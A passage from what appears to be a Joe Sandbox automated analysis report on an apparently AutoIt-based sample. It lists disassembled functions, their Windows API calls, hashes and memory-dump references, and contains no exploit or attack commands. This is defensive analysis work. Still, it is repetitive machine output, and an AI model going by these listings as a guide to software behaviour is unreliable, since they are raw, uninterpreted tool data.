                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: 3d777bb82481eb7555e67698370793407793c51bad3a7143aab89dbfc95d2a8d
                                          • Instruction ID: 2e75dead394358ee7b94505bd6e81a13167abb00180e1bcecf11a32dcc6e793b
                                          • Opcode Fuzzy Hash: 3d777bb82481eb7555e67698370793407793c51bad3a7143aab89dbfc95d2a8d
                                          • Instruction Fuzzy Hash: 960148B09017597DE3009F5A8C85A52FEA8FF19354F00411BA15847941C7F5A868CBE5
                                          Function 00E3568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E3569B
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E356B1
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00E356C0
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E356CF
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E356D9
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E356E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: c3d149b30bf805c53216dbaa6fddf91056ad632a14d2f50383ed55dc0593963a
                                          • Instruction ID: c8ef6b930f79d94c5d9360c3fa0bc99548ac0ebee5710b8f20b025cf033d4180
                                          • Opcode Fuzzy Hash: c3d149b30bf805c53216dbaa6fddf91056ad632a14d2f50383ed55dc0593963a
                                          • Instruction Fuzzy Hash: 85F06232141618BFE7245B539D0DEAB7F7CEBC6B12F000569FA00E105196A01A0586F5
                                          Function 00E374D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00E374E5
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00E374F6
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00DE1044,?,?), ref: 00E37503
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00DE1044,?,?), ref: 00E37510
                                            • Part of subcall function 00E36ED7: CloseHandle.KERNEL32(00000000,?,00E3751D,?,00DE1044,?,?), ref: 00E36EE1
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E37523
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00E3752A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: dba931028e210dc8b7c8ddec3e4caf489e606d52ca01841bfa5fc037ab65d907
                                          • Instruction ID: 4ae0c5b7d8cddacf0e92d56e3f055fd35072e0c51ce9975644568bbe0ac76fd8
                                          • Opcode Fuzzy Hash: dba931028e210dc8b7c8ddec3e4caf489e606d52ca01841bfa5fc037ab65d907
                                          • Instruction Fuzzy Hash: D4F09ABA441712AFEB192B25EC8CAEB3B2AAF04303F001931F602B04B1CB715808CA50
                                          Function 00E48902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E48928
                                          • CharUpperBuffW.USER32(?,?), ref: 00E48A37
                                          • VariantClear.OLEAUT32(?), ref: 00E48BAF
                                            • Part of subcall function 00E37804: VariantInit.OLEAUT32(00000000), ref: 00E37844
                                            • Part of subcall function 00E37804: VariantCopy.OLEAUT32(00000000,?), ref: 00E3784D
                                            • Part of subcall function 00E37804: VariantClear.OLEAUT32(00000000), ref: 00E37859
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: 90a34f6d493d4379f38523ed80207866195a7540896dbeefdeed56b1c1c5cc7c
                                          • Instruction ID: 7c2f460961494ff54dfba63776d19ed7c9cf9fd66f890c72bb5921f69b32adef
                                          • Opcode Fuzzy Hash: 90a34f6d493d4379f38523ed80207866195a7540896dbeefdeed56b1c1c5cc7c
                                          • Instruction Fuzzy Hash: E291AE746083019FC714DF24D58496EBBE4EF88304F04996EF89AAB361DB31E905CB62
                                          Function 00E32F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DEFEC6: _wcscpy.LIBCMT ref: 00DEFEE9
                                          • _memset.LIBCMT ref: 00E33077
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E330A6
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E33159
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E33187
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: d0ea946302d081bc0d75c352b01d76820ce682d38b2951b3f25a0d64aafe9147
                                          • Instruction ID: af48a14a709b13f1e1bf18c26621871f085e22d15362e20964558ada7216ea70
                                          • Opcode Fuzzy Hash: d0ea946302d081bc0d75c352b01d76820ce682d38b2951b3f25a0d64aafe9147
                                          • Instruction Fuzzy Hash: FD5190316093009AD7299B34D849A6BBFE4EF85354F045A2EF895F3291DB60CE44CBA2
                                          Function 00E2DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00E2DAC5
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E2DAFB
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E2DB0C
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E2DB8E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: DllGetClassObject
                                          • API String ID: 753597075-1075368562
                                          • Opcode ID: 37446d1aa6ee97f7032ca249e73600f460c54aaa9c69fcbfd4e8a825a0e91a1d
                                          • Instruction ID: fb5e8e08fa4a311e7cd94466a32688a4a44da61b1b648c768d93c009f85bbcc6
                                          • Opcode Fuzzy Hash: 37446d1aa6ee97f7032ca249e73600f460c54aaa9c69fcbfd4e8a825a0e91a1d
                                          • Instruction Fuzzy Hash: 8A41B1B1604218EFDB04CF65DC84A9ABBB9EF44310F1590A9EE09EF206D7B0DD44CBA0
                                          Function 00E32C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E32CAF
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E32CCB
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00E32D11
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E96890,00000000), ref: 00E32D5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: 65f6370fa80852b66602c8668b34f8ad953d2dfde1b51372dd06cd157465d0aa
                                          • Instruction ID: 5aa9686966e486f03184dcc7c3dc673a2aa77f87774e5a95797431bad570973e
                                          • Opcode Fuzzy Hash: 65f6370fa80852b66602c8668b34f8ad953d2dfde1b51372dd06cd157465d0aa
                                          • Instruction Fuzzy Hash: A24193302043029FD724DF24C849B6ABBE4EF85324F14565EFAA5A72D1DB70E904CBA2
                                          Function 00E4DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E4DAD9
                                            • Part of subcall function 00DD79AB: _memmove.LIBCMT ref: 00DD79F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharLower_memmove
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 3425801089-567219261
                                          • Opcode ID: b25928007ab0b48596893e4db27c1924055189954e207a38cf95ba33915648d2
                                          • Instruction ID: c24105116d872da91f0a8213b1a8419ea150c554922609896552af300a731625
                                          • Opcode Fuzzy Hash: b25928007ab0b48596893e4db27c1924055189954e207a38cf95ba33915648d2
                                          • Instruction Fuzzy Hash: 7731C17090461AAFCF10EF54DC819FEB7B4FF45310B109A6AE865B7791DB31A905CBA0
                                          Function 00E29372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E293F6
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E29409
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E29439
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 365058703-1403004172
                                          • Opcode ID: eecb3535d5db0504210f7244831c69b83594a3c2826e550640f8377cacb8d210
                                          • Instruction ID: 29663d442a2ddb38926373969a19b0fe712060b10603c0875a8af5b740671af1
                                          • Opcode Fuzzy Hash: eecb3535d5db0504210f7244831c69b83594a3c2826e550640f8377cacb8d210
                                          • Instruction Fuzzy Hash: 9421D271900214BEDB14AB70EC85CFFB7B8DF05354F14652AF925A72E2DB35090A9630
                                          Function 00E56656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DD1D73
                                            • Part of subcall function 00DD1D35: GetStockObject.GDI32(00000011), ref: 00DD1D87
                                            • Part of subcall function 00DD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD1D91
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E566D0
                                          • LoadLibraryW.KERNEL32(?), ref: 00E566D7
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E566EC
                                          • DestroyWindow.USER32(?), ref: 00E566F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: c0e58f987d42d473abcd8e8ea39ce193c4bc4968d7c0b1960d51971292b6a097
                                          • Instruction ID: 0afe903e8e5891867dd783590a42e0a9f6942c06aff34252f10521ea8ba3a8c5
                                          • Opcode Fuzzy Hash: c0e58f987d42d473abcd8e8ea39ce193c4bc4968d7c0b1960d51971292b6a097
                                          • Instruction Fuzzy Hash: 3721CF71100205AFEF108F64DC80EBB77ADEB1932AF902A2AFD11B3190C7B1CC499760
                                          Function 00E3703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00E3705E
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E37091
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00E370A3
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E370DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: 3a33570891684039d86f5930981ee3628124aea7b7bdbbce8bc8805cadaeb3fe
                                          • Instruction ID: adbf0dfa3744a8499b427c8bbd9be5ea03de3f1268418eb44aba3e1e14686ae1
                                          • Opcode Fuzzy Hash: 3a33570891684039d86f5930981ee3628124aea7b7bdbbce8bc8805cadaeb3fe
                                          • Instruction Fuzzy Hash: 48217FB4604309ABDF349F39D809A9A7BE8AF44724F205A19F8E0F72D0D7719840CB50
                                          Function 00E3710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E3712B
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E3715D
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E3716E
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E371A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: 06161656d8bef5476b246bf6c27e9eabdf04fafa6c91438056e142c120d0260f
                                          • Instruction ID: 95ac649960a888990e239752fc2bf197d1edb3858109c14668036eb15be7b725
                                          • Opcode Fuzzy Hash: 06161656d8bef5476b246bf6c27e9eabdf04fafa6c91438056e142c120d0260f
                                          • Instruction Fuzzy Hash: 3B21A4B6605305ABDF309F699C08AAABBE8AF55724F201A19FCE0F72D0D7709841CB50
                                          Function 00E3AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E3AEBF
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E3AF13
                                          • __swprintf.LIBCMT ref: 00E3AF2C
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E5F910), ref: 00E3AF6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: ebd3eaef3879722180764789e97134b04c0b60a8a38828b5960238a407b85c52
                                          • Instruction ID: bd90c521d1f4f4694dfe3bb413c811961063af136f8dd6169703a2267a0db522
                                          • Opcode Fuzzy Hash: ebd3eaef3879722180764789e97134b04c0b60a8a38828b5960238a407b85c52
                                          • Instruction Fuzzy Hash: 1E217470600209AFCB10EF65C985DAEBBB8EF49704B014069F909EB351DB31EE45CB71
                                          Function 00E2A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                            • Part of subcall function 00E2A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E2A399
                                            • Part of subcall function 00E2A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E2A3AC
                                            • Part of subcall function 00E2A37C: GetCurrentThreadId.KERNEL32 ref: 00E2A3B3
                                            • Part of subcall function 00E2A37C: AttachThreadInput.USER32(00000000), ref: 00E2A3BA
                                          • GetFocus.USER32 ref: 00E2A554
                                            • Part of subcall function 00E2A3C5: GetParent.USER32(?), ref: 00E2A3D3
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E2A59D
                                          • EnumChildWindows.USER32(?,00E2A615), ref: 00E2A5C5
                                          • __swprintf.LIBCMT ref: 00E2A5DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
